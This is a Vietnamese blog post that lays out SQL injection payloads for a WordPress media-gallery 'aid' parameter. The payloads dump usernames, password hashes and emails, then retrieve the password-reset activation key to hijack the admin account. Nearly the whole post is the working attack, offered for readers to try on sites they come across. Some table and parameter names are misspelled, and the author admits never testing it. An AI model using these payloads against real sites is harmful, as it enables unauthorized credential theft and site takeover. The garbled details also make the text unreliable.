NamHome

1
Một Số Lệnh Bypass Dạng /?aid=IP

Album Một Số Lệnh Bypass Dạng /?aid=IP

Xuân Đạt thêm một ảnh mới trongTuổi Trẻ IT. vào 09:39:00 • Thành phố Bắc Ninh
Tuy không biết nó còn hữu dụng hay không nhưng mình đăng lên cho các bạn học hỏi thêm thôi
nếu ai có dịp gặp dạng lỗi giống thế này thì test thử luôn /?aid=IP
-------------------------------------------------------------------------------------------
?aid=-1 union select concat (user_name, 0x3a, user_password, 0x3a, user_email) ,2,3,4 from wp-usera--
------------------------------------------------------------------------------------------
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp-usera--
------------------------------------------------------------------------------------------
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp_usera--
------------------------------------------------------------------------------------------
http://xxx.xx/xxx/xxxx/
?aid=-1 union select concat(user_activation_key),2,3,4 from wp_usera--
(gõ lệnh này sau khi nhập gmail xác nhận đổi pass ở lệnh thứ 3)
nó sẽ hiện ra 1 key xác nhận
------------------------------------------------------------------------------------------
http://xxx.xx/xx/
wp-login.php?acction=rp&key=gõ key xác nhận đó vào
------------------------------------------------------------------------------------------
bước cuối cùng là đổi pass
-----------------------------------------------------------------------------------------
không biết nó còn hữu dụng hay không nhưng cách này có thể hack dc trang web
tuy tôi chưa test ma2cung4 chả biết nó là lỗi gì
-----------------------------------------------------------------------------------------
ví dụ cụ thể
www.test.it/site/media-gallery/?aid=1
ta sẽ có các lệnh như sau:
---------------------------------------------------------------------------------------
*
www.test.it/site/media-gallery/
?aid=-1 union select concat (user_name, 0x3a, user_password, 0x3a, user_email) ,2,3,4 from wp-usera--
*
www.test.it/site/media-gallery/
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp-usera--
*
www.test.it/site/media-gallery/
?aid=-1 union select concat(user_login, 0x3a,user_pass,0x3a, user_email),2,3,4 from wp_usera--
*
lúc này nó sẽ ra gmail và tài khoản để login nhưng tài khoản vẩn chưa được giải mã
*
tiếp tục vào trang admin và bấm vào tôi quên mật khẩu rồi xác nhận và bấm tiếp lệnh
www.test.it/site/media-gallery/
?aid=-1 union select concat(user_activation_key),2,3,4 from wp_usera--
*
Sau gõ link này vào nó sẽ hiện lên cho bạn một key xác nhận để đổi mật khẩu mà không cần thông qua gmail
Ví dụ key: GU4Stt0zKGWzl8siEjJh
*
sau khi có key bạn vào trang admin và gõ
www.test.it/site/media-gallery/
wp-login.php?acction=rp&key=GU4Stt0zKGWzl8siEjJh
*
Và Thế là một giao diện đối mật khẩu hiện ra
bạn chỉ cần bấm mật khẩu mới và xác nhận mật khẩu xong bấm ok
Coi như bạn đã nằm được quyền điều hành 1 trang web 
có thể là của WP hay web thường

Bạn, Nguyễn Văn Nghĩa và người khác
Bình luận
Chia sẻ

Đăng ký: Đăng Nhận xét (Atom)
Thông báo
Blog mình đang trong quá trình chỉnh sửa và hoàn thiện template mới nên còn một số chức năng click vào nhưng chưa dùng được. Lưu ý những blog nào đã liên kết với bên mình vui lòng đọc bài này để cập nhật logo blog nhé.
ĐÃ HIỂU